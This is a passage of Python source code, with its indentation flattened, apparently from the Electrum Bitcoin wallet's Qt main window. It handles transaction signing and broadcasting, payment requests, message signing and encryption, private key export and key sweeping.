feerate_warning = simple_config.FEERATE_WARNING_HIGH_FEE
if fee > feerate_warning * tx.estimated_size() / 1000:
msg.append(_('Warning') + ': ' + _("The fee for this transaction seems unusually high."))
if self.wallet.has_keystore_encryption():
msg.append("")
msg.append(_("Enter your password to proceed"))
password = self.password_dialog('\n'.join(msg))
if not password:
return
else:
msg.append(_('Proceed?'))
password = None
if not self.question('\n'.join(msg)):
return
def sign_done(success):
if success:
if not tx.is_complete():
self.show_transaction(tx)
self.do_clear()
else:
self.broadcast_transaction(tx, tx_desc)
self.sign_tx_with_password(tx, sign_done, password)
@protected
def sign_tx(self, tx, callback, password):
self.sign_tx_with_password(tx, callback, password)
def sign_tx_with_password(self, tx, callback, password):
'''Sign the transaction in a separate thread. When done, calls
the callback with a success code of True or False.
'''
def on_success(result):
callback(True)
def on_failure(exc_info):
self.on_error(exc_info)
callback(False)
on_success = run_hook('tc_sign_wrapper', self.wallet, tx, on_success, on_failure) or on_success
if self.tx_external_keypairs:
# can sign directly
task = partial(Transaction.sign, tx, self.tx_external_keypairs)
else:
task = partial(self.wallet.sign_transaction, tx, password)
msg = _('Signing transaction...')
WaitingDialog(self, msg, task, on_success, on_failure)
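# Broadcast on a background thread via WaitingDialog; for BIP70 payment requests,
# also mark the invoice as paid and send the payment message to the merchant,
# then report the result back on the GUI thread.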
def broadcast_transaction(self, tx, tx_desc):
def broadcast_thread():
# non-GUI thread
pr = self.payment_request
if pr and pr.has_expired():
self.payment_request = None
return False, _("Payment request has expired")
status = False
try:
self.network.run_from_another_thread(self.network.broadcast_transaction(tx))
except TxBroadcastError as e:
msg = e.get_message_for_gui()
except BestEffortRequestFailed as e:
msg = repr(e)
else:
status, msg = True, tx.txid()
if pr and status is True:
self.invoices.set_paid(pr, tx.txid())
self.invoices.save()
self.payment_request = None
refund_address = self.wallet.get_receiving_address()
coro = pr.send_payment_and_receive_paymentack(str(tx), refund_address)
fut = asyncio.run_coroutine_threadsafe(coro, self.network.asyncio_loop)
ack_status, ack_msg = fut.result(timeout=20)
self.logger.info(f"Payment ACK: {ack_status}. Ack message: {ack_msg}")
return status, msg
# Capture current TL window; override might be removed on return
parent = self.top_level_window(lambda win: isinstance(win, MessageBoxMixin))
def broadcast_done(result):
# GUI thread
if result:
status, msg = result
if status:
if tx_desc is not None and tx.is_complete():
self.wallet.set_label(tx.txid(), tx_desc)
parent.show_message(_('Payment sent.') + '\n' + msg)
self.invoice_list.update()
self.do_clear()
else:
msg = msg or ''
parent.show_error(msg)
WaitingDialog(self, _('Broadcasting transaction...'),
broadcast_thread, broadcast_done, self.on_error)
def query_choice(self, msg, choices):
# Needed by QtHandler for hardware wallets
dialog = WindowModalDialog(self.top_level_window())
clayout = ChoicesLayout(msg, choices)
vbox = QVBoxLayout(dialog)
vbox.addLayout(clayout.layout())
vbox.addLayout(Buttons(OkButton(dialog)))
if not dialog.exec_():
return None
return clayout.selected_index()
def lock_amount(self, b):
self.amount_e.setFrozen(b)
self.max_button.setEnabled(not b)
def prepare_for_payment_request(self):
self.show_send_tab()
self.payto_e.is_pr = True
for e in [self.payto_e, self.message_e]:
e.setFrozen(True)
self.lock_amount(True)
self.payto_e.setText(_("please wait..."))
return True
def delete_invoice(self, key):
self.invoices.remove(key)
self.invoice_list.update()
def payment_request_ok(self):
pr = self.payment_request
if not pr:
return
key = self.invoices.add(pr)
status = self.invoices.get_status(key)
self.invoice_list.update()
if status == PR_PAID:
self.show_message("invoice already paid")
self.do_clear()
self.payment_request = None
return
self.payto_e.is_pr = True
if not pr.has_expired():
self.payto_e.setGreen()
else:
self.payto_e.setExpired()
self.payto_e.setText(pr.get_requestor())
self.amount_e.setText(format_satoshis_plain(pr.get_amount(), self.decimal_point))
self.message_e.setText(pr.get_memo())
# signal to set fee
self.amount_e.textEdited.emit("")
def payment_request_error(self):
pr = self.payment_request
if not pr:
return
self.show_message(pr.error)
self.payment_request = None
self.do_clear()
def on_pr(self, request):
self.payment_request = request
if self.payment_request.verify(self.contacts):
self.payment_request_ok_signal.emit()
else:
self.payment_request_error_signal.emit()
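# Handle a bitcoin: URI. BIP70 requests (an 'r' parameter, or name plus sig) are
# fetched asynchronously and delivered through on_pr; plain URIs fill the send
# form fields directly.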
def pay_to_URI(self, URI):
if not URI:
return
try:
out = util.parse_URI(URI, self.on_pr)
except InvalidBitcoinURI as e:
self.show_error(_("Error parsing URI") + f":\n{e}")
return
self.show_send_tab()
r = out.get('r')
sig = out.get('sig')
name = out.get('name')
if r or (name and sig):
self.prepare_for_payment_request()
return
address = out.get('address')
amount = out.get('amount')
label = out.get('label')
message = out.get('message')
# use label as description (not BIP21 compliant)
if label and not message:
message = label
if address:
self.payto_e.setText(address)
if message:
self.message_e.setText(message)
if amount:
self.amount_e.setAmount(amount)
self.amount_e.textEdited.emit("")
def do_clear(self):
self.max_button.setChecked(False)
self.not_enough_funds = False
self.payment_request = None
self.payto_e.is_pr = False
for e in [self.payto_e, self.message_e, self.amount_e, self.fiat_send_e,
self.fee_e, self.feerate_e]:
e.setText('')
e.setFrozen(False)
self.fee_slider.activate()
self.feerate_e.setAmount(self.config.fee_per_byte())
self.size_e.setAmount(0)
self.feerounding_icon.setVisible(False)
self.set_pay_from([])
self.tx_external_keypairs = {}
self.update_status()
run_hook('do_clear', self)
def set_frozen_state_of_addresses(self, addrs, freeze: bool):
self.wallet.set_frozen_state_of_addresses(addrs, freeze)
self.address_list.update()
self.utxo_list.update()
self.update_fee()
def set_frozen_state_of_coins(self, utxos, freeze: bool):
self.wallet.set_frozen_state_of_coins(utxos, freeze)
self.utxo_list.update()
self.update_fee()
def create_list_tab(self, l, toolbar=None):
w = QWidget()
w.searchable_list = l
vbox = QVBoxLayout()
w.setLayout(vbox)
vbox.setContentsMargins(0, 0, 0, 0)
vbox.setSpacing(0)
if toolbar:
vbox.addLayout(toolbar)
vbox.addWidget(l)
return w
def create_addresses_tab(self):
from .address_list import AddressList
self.address_list = l = AddressList(self)
toolbar = l.create_toolbar(self.config)
toolbar_shown = self.config.get('show_toolbar_addresses', False)
l.show_toolbar(toolbar_shown)
return self.create_list_tab(l, toolbar)
def create_utxo_tab(self):
from .utxo_list import UTXOList
self.utxo_list = l = UTXOList(self)
return self.create_list_tab(l)
def create_contacts_tab(self):
from .contact_list import ContactList
self.contact_list = l = ContactList(self)
return self.create_list_tab(l)
def remove_address(self, addr):
if self.question(_("Do you want to remove {} from your wallet?").format(addr)):
self.wallet.delete_address(addr)
self.need_update.set() # history, addresses, coins
self.clear_receive_tab()
def get_coins(self):
if self.pay_from:
return self.pay_from
else:
return self.wallet.get_spendable_coins(None, self.config)
def spend_coins(self, coins):
self.set_pay_from(coins)
self.show_send_tab()
self.update_fee()
def paytomany(self):
self.show_send_tab()
self.payto_e.paytomany()
msg = '\n'.join([
_('Enter a list of outputs in the \'Pay to\' field.'),
_('One output per line.'),
_('Format: address, amount'),
_('You may load a CSV file using the file icon.')
])
self.show_message(msg, title=_('Pay to many'))
def payto_contacts(self, labels):
paytos = [self.get_contact_payto(label) for label in labels]
self.show_send_tab()
if len(paytos) == 1:
self.payto_e.setText(paytos[0])
self.amount_e.setFocus()
else:
text = "\n".join([payto + ", 0" for payto in paytos])
self.payto_e.setText(text)
self.payto_e.setFocus()
def set_contact(self, label, address):
if not is_address(address):
self.show_error(_('Invalid Address'))
self.contact_list.update() # Displays original unchanged value
return False
self.contacts[address] = ('address', label)
self.contact_list.update()
self.history_list.update()
self.update_completions()
return True
def delete_contacts(self, labels):
if not self.question(_("Remove {} from your list of contacts?")
.format(" + ".join(labels))):
return
for label in labels:
self.contacts.pop(label)
self.history_list.update()
self.contact_list.update()
self.update_completions()
def show_invoice(self, key):
pr = self.invoices.get(key)
if pr is None:
self.show_error(_('Cannot find payment request in wallet.'))
return
pr.verify(self.contacts)
self.show_pr_details(pr)
def show_pr_details(self, pr):
key = pr.get_id()
d = WindowModalDialog(self, _("Invoice"))
vbox = QVBoxLayout(d)
grid = QGridLayout()
grid.addWidget(QLabel(_("Requestor") + ':'), 0, 0)
grid.addWidget(QLabel(pr.get_requestor()), 0, 1)
grid.addWidget(QLabel(_("Amount") + ':'), 1, 0)
outputs_str = '\n'.join(map(lambda x: self.format_amount(x[2])+ self.base_unit() + ' @ ' + x[1], pr.get_outputs()))
grid.addWidget(QLabel(outputs_str), 1, 1)
expires = pr.get_expiration_date()
grid.addWidget(QLabel(_("Memo") + ':'), 2, 0)
grid.addWidget(QLabel(pr.get_memo()), 2, 1)
grid.addWidget(QLabel(_("Signature") + ':'), 3, 0)
grid.addWidget(QLabel(pr.get_verify_status()), 3, 1)
if expires:
grid.addWidget(QLabel(_("Expires") + ':'), 4, 0)
grid.addWidget(QLabel(format_time(expires)), 4, 1)
vbox.addLayout(grid)
def do_export():
name = str(key) + '.bip70'
fn = self.getSaveFileName(_("Save invoice to file"), name, filter="*.bip70")
if not fn:
return
with open(fn, 'wb') as f:
f.write(pr.raw)
self.show_message(_('Invoice saved as') + ' ' + fn)
exportButton = EnterButton(_('Save'), do_export)
def do_delete():
if self.question(_('Delete invoice?')):
self.invoices.remove(key)
self.history_list.update()
self.invoice_list.update()
d.close()
deleteButton = EnterButton(_('Delete'), do_delete)
vbox.addLayout(Buttons(exportButton, deleteButton, CloseButton(d)))
d.exec_()
def do_pay_invoice(self, key):
pr = self.invoices.get(key)
self.payment_request = pr
self.prepare_for_payment_request()
pr.error = None # this forces verify() to re-run
if pr.verify(self.contacts):
self.payment_request_ok()
else:
self.payment_request_error()
def create_console_tab(self):
from .console import Console
self.console = console = Console()
return console
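# Populate the console namespace with the wallet/network objects and wrap every
# Commands method so it can prompt for a password when one is required.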
def update_console(self):
console = self.console
console.history = self.config.get("console-history",[])
console.history_index = len(console.history)
console.updateNamespace({
'wallet': self.wallet,
'network': self.network,
'plugins': self.gui_object.plugins,
'window': self,
'config': self.config,
'electrum': electrum,
'daemon': self.gui_object.daemon,
'util': util,
'bitcoin': bitcoin,
})
c = commands.Commands(self.config, self.wallet, self.network, lambda: self.console.set_json(True))
methods = {}
def mkfunc(f, method):
return lambda *args, **kwargs: f(method, args, self.password_dialog, **kwargs)
for m in dir(c):
if m[0]=='_' or m in ['network','wallet','config']: continue
methods[m] = mkfunc(c._run, m)
console.updateNamespace(methods)
def create_status_bar(self):
sb = QStatusBar()
sb.setFixedHeight(35)
self.balance_label = QLabel("Loading wallet...")
self.balance_label.setTextInteractionFlags(Qt.TextSelectableByMouse)
self.balance_label.setStyleSheet("""QLabel { padding: 0 }""")
sb.addWidget(self.balance_label)
self.search_box = QLineEdit()
self.search_box.textChanged.connect(self.do_search)
self.search_box.hide()
sb.addPermanentWidget(self.search_box)
self.update_check_button = QPushButton("")
self.update_check_button.setFlat(True)
self.update_check_button.setCursor(QCursor(Qt.PointingHandCursor))
self.update_check_button.setIcon(read_QIcon("update.png"))
self.update_check_button.hide()
sb.addPermanentWidget(self.update_check_button)
self.password_button = StatusBarButton(QIcon(), _("Password"), self.change_password_dialog )
sb.addPermanentWidget(self.password_button)
sb.addPermanentWidget(StatusBarButton(read_QIcon("preferences.png"), _("Preferences"), self.settings_dialog ) )
self.seed_button = StatusBarButton(read_QIcon("seed.png"), _("Seed"), self.show_seed_dialog )
sb.addPermanentWidget(self.seed_button)
self.status_button = StatusBarButton(read_QIcon("status_disconnected.png"), _("Network"), lambda: self.gui_object.show_network_dialog(self))
sb.addPermanentWidget(self.status_button)
run_hook('create_status_bar', sb)
self.setStatusBar(sb)
def update_lock_icon(self):
icon = read_QIcon("lock.png") if self.wallet.has_password() else read_QIcon("unlock.png")
self.password_button.setIcon(icon)
def update_buttons_on_seed(self):
self.seed_button.setVisible(self.wallet.has_seed())
self.password_button.setVisible(self.wallet.may_have_password())
self.send_button.setVisible(not self.wallet.is_watching_only())
def change_password_dialog(self):
from electrum.storage import STO_EV_XPUB_PW
if self.wallet.get_available_storage_encryption_version() == STO_EV_XPUB_PW:
from .password_dialog import ChangePasswordDialogForHW
d = ChangePasswordDialogForHW(self, self.wallet)
ok, encrypt_file = d.run()
if not ok:
return
try:
hw_dev_pw = self.wallet.keystore.get_password_for_storage_encryption()
except UserCancelled:
return
except BaseException as e:
self.logger.exception('')
self.show_error(repr(e))
return
old_password = hw_dev_pw if self.wallet.has_password() else None
new_password = hw_dev_pw if encrypt_file else None
else:
from .password_dialog import ChangePasswordDialogForSW
d = ChangePasswordDialogForSW(self, self.wallet)
ok, old_password, new_password, encrypt_file = d.run()
if not ok:
return
try:
self.wallet.update_password(old_password, new_password, encrypt_file)
except InvalidPassword as e:
self.show_error(str(e))
return
except BaseException:
self.logger.exception('Failed to update password')
self.show_error(_('Failed to update password'))
return
msg = _('Password was updated successfully') if self.wallet.has_password() else _('Password is disabled, this wallet is not protected')
self.show_message(msg, title=_("Success"))
self.update_lock_icon()
def toggle_search(self):
tab = self.tabs.currentWidget()
#if hasattr(tab, 'searchable_list'):
# tab.searchable_list.toggle_toolbar()
#return
self.search_box.setHidden(not self.search_box.isHidden())
if not self.search_box.isHidden():
self.search_box.setFocus(1)
else:
self.do_search('')
def do_search(self, t):
tab = self.tabs.currentWidget()
if hasattr(tab, 'searchable_list'):
tab.searchable_list.filter(t)
def new_contact_dialog(self):
d = WindowModalDialog(self, _("New Contact"))
vbox = QVBoxLayout(d)
vbox.addWidget(QLabel(_('New Contact') + ':'))
grid = QGridLayout()
line1 = QLineEdit()
line1.setFixedWidth(32 * char_width_in_lineedit())
line2 = QLineEdit()
line2.setFixedWidth(32 * char_width_in_lineedit())
grid.addWidget(QLabel(_("Address")), 1, 0)
grid.addWidget(line1, 1, 1)
grid.addWidget(QLabel(_("Name")), 2, 0)
grid.addWidget(line2, 2, 1)
vbox.addLayout(grid)
vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
if d.exec_():
self.set_contact(line2.text(), line1.text())
def show_master_public_keys(self):
dialog = WindowModalDialog(self, _("Wallet Information"))
dialog.setMinimumSize(500, 100)
mpk_list = self.wallet.get_master_public_keys()
vbox = QVBoxLayout()
wallet_type = self.wallet.storage.get('wallet_type', '')
if self.wallet.is_watching_only():
wallet_type += ' [{}]'.format(_('watching-only'))
seed_available = _('True') if self.wallet.has_seed() else _('False')
keystore_types = [k.get_type_text() for k in self.wallet.get_keystores()]
grid = QGridLayout()
basename = os.path.basename(self.wallet.storage.path)
grid.addWidget(QLabel(_("Wallet name")+ ':'), 0, 0)
grid.addWidget(QLabel(basename), 0, 1)
grid.addWidget(QLabel(_("Wallet type")+ ':'), 1, 0)
grid.addWidget(QLabel(wallet_type), 1, 1)
grid.addWidget(QLabel(_("Script type")+ ':'), 2, 0)
grid.addWidget(QLabel(self.wallet.txin_type), 2, 1)
grid.addWidget(QLabel(_("Seed available") + ':'), 3, 0)
grid.addWidget(QLabel(str(seed_available)), 3, 1)
if len(keystore_types) <= 1:
grid.addWidget(QLabel(_("Keystore type") + ':'), 4, 0)
ks_type = str(keystore_types[0]) if keystore_types else _('No keystore')
grid.addWidget(QLabel(ks_type), 4, 1)
vbox.addLayout(grid)
if self.wallet.is_deterministic():
mpk_text = ShowQRTextEdit()
mpk_text.setMaximumHeight(150)
mpk_text.addCopyButton(self.app)
def show_mpk(index):
mpk_text.setText(mpk_list[index])
mpk_text.repaint() # macOS hack for #4777
# only show the combobox in case multiple accounts are available
if len(mpk_list) > 1:
def label(key):
if isinstance(self.wallet, Multisig_Wallet):
return _("cosigner") + f' {key+1} ( keystore: {keystore_types[key]} )'
return ''
labels = [label(i) for i in range(len(mpk_list))]
on_click = lambda clayout: show_mpk(clayout.selected_index())
labels_clayout = ChoicesLayout(_("Master Public Keys"), labels, on_click)
vbox.addLayout(labels_clayout.layout())
else:
vbox.addWidget(QLabel(_("Master Public Key")))
show_mpk(0)
vbox.addWidget(mpk_text)
vbox.addStretch(1)
vbox.addLayout(Buttons(CloseButton(dialog)))
dialog.setLayout(vbox)
dialog.exec_()
def remove_wallet(self):
if self.question('\n'.join([
_('Delete wallet file?'),
"%s"%self.wallet.storage.path,
_('If your wallet contains funds, make sure you have saved its seed.')])):
self._delete_wallet()
@protected
def _delete_wallet(self, password):
wallet_path = self.wallet.storage.path
basename = os.path.basename(wallet_path)
r = self.gui_object.daemon.delete_wallet(wallet_path)
self.close()
if r:
self.show_error(_("Wallet removed: {}").format(basename))
else:
self.show_error(_("Wallet file not found: {}").format(basename))
@protected
def show_seed_dialog(self, password):
if not self.wallet.has_seed():
self.show_message(_('This wallet has no seed'))
return
keystore = self.wallet.get_keystore()
try:
seed = keystore.get_seed(password)
passphrase = keystore.get_passphrase(password)
except BaseException as e:
self.show_error(repr(e))
return
from .seed_dialog import SeedDialog
d = SeedDialog(self, seed, passphrase)
d.exec_()
def show_qrcode(self, data, title = _("QR code"), parent=None):
if not data:
return
d = QRDialog(data, parent or self, title)
d.exec_()
@protected
def show_private_key(self, address, password):
if not address:
return
try:
pk, redeem_script = self.wallet.export_private_key(address, password)
except Exception as e:
self.logger.exception('')
self.show_message(repr(e))
return
xtype = bitcoin.deserialize_privkey(pk)[0]
d = WindowModalDialog(self, _("Private key"))
d.setMinimumSize(600, 150)
vbox = QVBoxLayout()
vbox.addWidget(QLabel(_("Address") + ': ' + address))
vbox.addWidget(QLabel(_("Script type") + ': ' + xtype))
vbox.addWidget(QLabel(_("Private key") + ':'))
keys_e = ShowQRTextEdit(text=pk)
keys_e.addCopyButton(self.app)
vbox.addWidget(keys_e)
if redeem_script:
vbox.addWidget(QLabel(_("Redeem Script") + ':'))
rds_e = ShowQRTextEdit(text=redeem_script)
rds_e.addCopyButton(self.app)
vbox.addWidget(rds_e)
vbox.addLayout(Buttons(CloseButton(d)))
d.setLayout(vbox)
d.exec_()
msg_sign = _("Signing with an address actually means signing with the corresponding "
"private key, and verifying with the corresponding public key. The "
"address you have entered does not have a unique public key, so these "
"operations cannot be performed.") + '\n\n' + \
_('The operation is undefined. Not just in Electrum, but in general.')
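# Sign a message with the private key of a wallet address (p2pkh, p2wpkh and
# p2wpkh-p2sh only); signing runs on the wallet thread and the base64 signature
# is written back into the dialog.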
@protected
def do_sign(self, address, message, signature, password):
address = address.text().strip()
message = message.toPlainText().strip()
if not bitcoin.is_address(address):
self.show_message(_('Invalid Bitcoin address.'))
return
if self.wallet.is_watching_only():
self.show_message(_('This is a watching-only wallet.'))
return
if not self.wallet.is_mine(address):
self.show_message(_('Address not in wallet.'))
return
txin_type = self.wallet.get_txin_type(address)
if txin_type not in ['p2pkh', 'p2wpkh', 'p2wpkh-p2sh']:
self.show_message(_('Cannot sign messages with this type of address:') + \
' ' + txin_type + '\n\n' + self.msg_sign)
return
task = partial(self.wallet.sign_message, address, message, password)
def show_signed_message(sig):
try:
signature.setText(base64.b64encode(sig).decode('ascii'))
except RuntimeError:
# (signature) wrapped C/C++ object has been deleted
pass
self.wallet.thread.add(task, on_success=show_signed_message)
def do_verify(self, address, message, signature):
address = address.text().strip()
message = message.toPlainText().strip().encode('utf-8')
if not bitcoin.is_address(address):
self.show_message(_('Invalid Bitcoin address.'))
return
try:
# This can throw on invalid base64
sig = base64.b64decode(str(signature.toPlainText()))
verified = ecc.verify_message_with_address(address, sig, message)
except Exception as e:
verified = False
if verified:
self.show_message(_("Signature verified"))
else:
self.show_error(_("Wrong signature"))
def sign_verify_message(self, address=''):
d = WindowModalDialog(self, _('Sign/verify Message'))
d.setMinimumSize(610, 290)
layout = QGridLayout(d)
message_e = QTextEdit()
message_e.setAcceptRichText(False)
layout.addWidget(QLabel(_('Message')), 1, 0)
layout.addWidget(message_e, 1, 1)
layout.setRowStretch(2,3)
address_e = QLineEdit()
address_e.setText(address)
layout.addWidget(QLabel(_('Address')), 2, 0)
layout.addWidget(address_e, 2, 1)
signature_e = QTextEdit()
signature_e.setAcceptRichText(False)
layout.addWidget(QLabel(_('Signature')), 3, 0)
layout.addWidget(signature_e, 3, 1)
layout.setRowStretch(3,1)
hbox = QHBoxLayout()
b = QPushButton(_("Sign"))
b.clicked.connect(lambda: self.do_sign(address_e, message_e, signature_e))
hbox.addWidget(b)
b = QPushButton(_("Verify"))
b.clicked.connect(lambda: self.do_verify(address_e, message_e, signature_e))
hbox.addWidget(b)
b = QPushButton(_("Close"))
b.clicked.connect(d.accept)
hbox.addWidget(b)
layout.addLayout(hbox, 4, 1)
d.exec_()
@protected
def do_decrypt(self, message_e, pubkey_e, encrypted_e, password):
if self.wallet.is_watching_only():
self.show_message(_('This is a watching-only wallet.'))
return
cyphertext = encrypted_e.toPlainText()
task = partial(self.wallet.decrypt_message, pubkey_e.text(), cyphertext, password)
def setText(text):
try:
message_e.setText(text.decode('utf-8'))
except RuntimeError:
# (message_e) wrapped C/C++ object has been deleted
pass
self.wallet.thread.add(task, on_success=setText)
def do_encrypt(self, message_e, pubkey_e, encrypted_e):
message = message_e.toPlainText()
message = message.encode('utf-8')
try:
public_key = ecc.ECPubkey(bfh(pubkey_e.text()))
except BaseException as e:
self.logger.exception('Invalid Public key')
self.show_warning(_('Invalid Public key'))
return
encrypted = public_key.encrypt_message(message)
encrypted_e.setText(encrypted.decode('ascii'))
def encrypt_message(self, address=''):
d = WindowModalDialog(self, _('Encrypt/decrypt Message'))
d.setMinimumSize(610, 490)
layout = QGridLayout(d)
message_e = QTextEdit()
message_e.setAcceptRichText(False)
layout.addWidget(QLabel(_('Message')), 1, 0)
layout.addWidget(message_e, 1, 1)
layout.setRowStretch(2,3)
pubkey_e = QLineEdit()
if address:
pubkey = self.wallet.get_public_key(address)
pubkey_e.setText(pubkey)
layout.addWidget(QLabel(_('Public key')), 2, 0)
layout.addWidget(pubkey_e, 2, 1)
encrypted_e = QTextEdit()
encrypted_e.setAcceptRichText(False)
layout.addWidget(QLabel(_('Encrypted')), 3, 0)
layout.addWidget(encrypted_e, 3, 1)
layout.setRowStretch(3,1)
hbox = QHBoxLayout()
b = QPushButton(_("Encrypt"))
b.clicked.connect(lambda: self.do_encrypt(message_e, pubkey_e, encrypted_e))
hbox.addWidget(b)
b = QPushButton(_("Decrypt"))
b.clicked.connect(lambda: self.do_decrypt(message_e, pubkey_e, encrypted_e))
hbox.addWidget(b)
b = QPushButton(_("Close"))
b.clicked.connect(d.accept)
hbox.addWidget(b)
layout.addLayout(hbox, 4, 1)
d.exec_()
def password_dialog(self, msg=None, parent=None):
from .password_dialog import PasswordDialog
parent = parent or self
d = PasswordDialog(parent, msg)
return d.run()
def tx_from_text(self, txt):
from electrum.transaction import tx_from_str
try:
tx = tx_from_str(txt)
return Transaction(tx)
except BaseException as e:
self.show_critical(_("Electrum was unable to parse your transaction") + ":\n" + repr(e))
return
def read_tx_from_qrcode(self):
from electrum import qrscanner
try:
data = qrscanner.scan_barcode(self.config.get_video_device())
except BaseException as e:
self.show_error(repr(e))
return
if not data:
return
# if the user scanned a bitcoin URI
if str(data).startswith("bitcoin:"):
self.pay_to_URI(data)
return
# else if the user scanned an offline signed tx
try:
data = bh2u(bitcoin.base_decode(data, length=None, base=43))
except BaseException as e:
self.show_error((_('Could not decode QR code')+':\n{}').format(repr(e)))
return
tx = self.tx_from_text(data)
if not tx:
return
self.show_transaction(tx)
def read_tx_from_file(self):
fileName = self.getOpenFileName(_("Select your transaction file"), "*.txn")
if not fileName:
return
try:
with open(fileName, "r") as f:
file_content = f.read()
except (ValueError, IOError, os.error) as reason:
self.show_critical(_("Electrum was unable to open your transaction file") + "\n" + str(reason), title=_("Unable to read file or no transaction found"))
return
return self.tx_from_text(file_content)
def do_process_from_text(self):
text = text_dialog(self, _('Input raw transaction'), _("Transaction:"), _("Load transaction"))
if not text:
return
tx = self.tx_from_text(text)
if tx:
self.show_transaction(tx)
def do_process_from_file(self):
tx = self.read_tx_from_file()
if tx:
self.show_transaction(tx)
def do_process_from_txid(self):
from electrum import transaction
txid, ok = QInputDialog.getText(self, _('Lookup transaction'), _('Transaction ID') + ':')
if ok and txid:
txid = str(txid).strip()
try:
raw_tx = self.network.run_from_another_thread(
self.network.get_transaction(txid, timeout=10))
except Exception as e:
self.show_message(_("Error getting transaction from network") + ":\n" + repr(e))
return
tx = transaction.Transaction(raw_tx)
self.show_transaction(tx)
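# Export every private key in the wallet. Keys are derived on a background
# thread so the dialog stays responsive; Qt signals update the progress text
# and enable the Export button once all keys are ready.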
@protected
def export_privkeys_dialog(self, password):
if self.wallet.is_watching_only():
self.show_message(_("This is a watching-only wallet"))
return
if isinstance(self.wallet, Multisig_Wallet):
self.show_message(_('WARNING: This is a multi-signature wallet.') + '\n' +
_('It cannot be "backed up" by simply exporting these private keys.'))
d = WindowModalDialog(self, _('Private keys'))
d.setMinimumSize(980, 300)
vbox = QVBoxLayout(d)
msg = "%s\n%s\n%s" % (_("WARNING: ALL your private keys are secret."),
_("Exposing a single private key can compromise your entire wallet!"),
_("In particular, DO NOT use 'redeem private key' services proposed by third parties."))
vbox.addWidget(QLabel(msg))
e = QTextEdit()
e.setReadOnly(True)
vbox.addWidget(e)
defaultname = 'electrum-private-keys.csv'
select_msg = _('Select file to export your private keys to')
hbox, filename_e, csv_button = filename_field(self, self.config, defaultname, select_msg)
vbox.addLayout(hbox)
b = OkButton(d, _('Export'))
b.setEnabled(False)
vbox.addLayout(Buttons(CancelButton(d), b))
private_keys = {}
addresses = self.wallet.get_addresses()
done = False
cancelled = False
def privkeys_thread():
for addr in addresses:
time.sleep(0.1)
if done or cancelled:
break
privkey = self.wallet.export_private_key(addr, password)[0]
private_keys[addr] = privkey
self.computing_privkeys_signal.emit()
if not cancelled:
self.computing_privkeys_signal.disconnect()
self.show_privkeys_signal.emit()
def show_privkeys():
s = "\n".join( map( lambda x: x[0] + "\t"+ x[1], private_keys.items()))
e.setText(s)
b.setEnabled(True)
self.show_privkeys_signal.disconnect()
nonlocal done
done = True
def on_dialog_closed(*args):
nonlocal done
nonlocal cancelled
if not done:
cancelled = True
self.computing_privkeys_signal.disconnect()
self.show_privkeys_signal.disconnect()
self.computing_privkeys_signal.connect(lambda: e.setText("Please wait... %d/%d"%(len(private_keys),len(addresses))))
self.show_privkeys_signal.connect(show_privkeys)
d.finished.connect(on_dialog_closed)
threading.Thread(target=privkeys_thread).start()
if not d.exec_():
done = True
return
filename = filename_e.text()
if not filename:
return
try:
self.do_export_privkeys(filename, private_keys, csv_button.isChecked())
except (IOError, os.error) as reason:
txt = "\n".join([
_("Electrum was unable to produce a private key-export."),
str(reason)
])
self.show_critical(txt, title=_("Unable to create csv"))
except Exception as e:
self.show_message(repr(e))
return
self.show_message(_("Private keys exported."))
def do_export_privkeys(self, fileName, pklist, is_csv):
with open(fileName, "w+") as f:
if is_csv:
transaction = csv.writer(f)
transaction.writerow(["address", "private_key"])
for addr, pk in pklist.items():
transaction.writerow(["%34s"%addr,pk])
else:
f.write(json.dumps(pklist, indent = 4))
def do_import_labels(self):
def import_labels(path):
def _validate(data):
return data # TODO
def import_labels_assign(data):
for key, value in data.items():
self.wallet.set_label(key, value)
import_meta(path, _validate, import_labels_assign)
def on_import():
self.need_update.set()
import_meta_gui(self, _('labels'), import_labels, on_import)
def do_export_labels(self):
def export_labels(filename):
export_meta(self.wallet.labels, filename)
export_meta_gui(self, _('labels'), export_labels)
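# Sweep funds from external private keys: prepare the inputs with
# sweep_preparations, load them as external keypairs, and pre-fill a max send
# to the chosen wallet address.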
def sweep_key_dialog(self):
d = WindowModalDialog(self, title=_('Sweep private keys'))
d.setMinimumSize(600, 300)
vbox = QVBoxLayout(d)
hbox_top = QHBoxLayout()
hbox_top.addWidget(QLabel(_("Enter private keys:")))
hbox_top.addWidget(InfoButton(WIF_HELP_TEXT), alignment=Qt.AlignRight)
vbox.addLayout(hbox_top)
keys_e = ScanQRTextEdit(allow_multi=True)
keys_e.setTabChangesFocus(True)
vbox.addWidget(keys_e)
addresses = self.wallet.get_unused_addresses()
if not addresses:
try:
addresses = self.wallet.get_receiving_addresses()
except AttributeError:
addresses = self.wallet.get_addresses()
h, address_e = address_field(addresses)
vbox.addLayout(h)
vbox.addStretch(1)
button = OkButton(d, _('Sweep'))
vbox.addLayout(Buttons(CancelButton(d), button))
button.setEnabled(False)
def get_address():
addr = str(address_e.text()).strip()
if bitcoin.is_address(addr):
return addr
def get_pk(*, raise_on_error=False):
text = str(keys_e.toPlainText())
return keystore.get_private_keys(text, raise_on_error=raise_on_error)
def on_edit():
valid_privkeys = False
try:
valid_privkeys = get_pk(raise_on_error=True) is not None
except Exception as e:
button.setToolTip(f'{_("Error")}: {repr(e)}')
else:
button.setToolTip('')
button.setEnabled(get_address() is not None and valid_privkeys)
on_address = lambda text: address_e.setStyleSheet((ColorScheme.DEFAULT if get_address() else ColorScheme.RED).as_stylesheet())
keys_e.textChanged.connect(on_edit)
address_e.textChanged.connect(on_edit)
address_e.textChanged.connect(on_address)
on_address(str(address_e.text()))
if not d.exec_():
return
# user pressed "sweep"
addr = get_address()
try:
self.wallet.check_address(addr)
except InternalAddressCorruption as e:
self.show_error(str(e))
raise
try:
coins, keypairs = sweep_preparations(get_pk(), self.network)
except Exception as e: # FIXME too broad...
self.show_message(repr(e))
return
self.do_clear()
self.tx_external_keypairs = keypairs
self.spend_coins(coins)
self.payto_e.setText(addr)
self.spend_max()
self.payto_e.setFrozen(True)
self.amount_e.setFrozen(True)
self.warn_if_watching_only()
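# Shared helper for importing addresses or private keys from a text dialog;
# reports up to ten successful and failed entries and refreshes the address and
# history lists.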
def _do_import(self, title, header_layout, func):
text = text_dialog(self, title, header_layout, _('Import'), allow_multi=True)
if not text:
return
keys = str(text).split()
good_inputs, bad_inputs = func(keys)
if good_inputs:
msg = '\n'.join(good_inputs[:10])
if len(good_inputs) > 10: msg += '\n...'
self.show_message(_("The following addresses were added")
+ f' ({len(good_inputs)}):\n' + msg)
if bad_inputs:
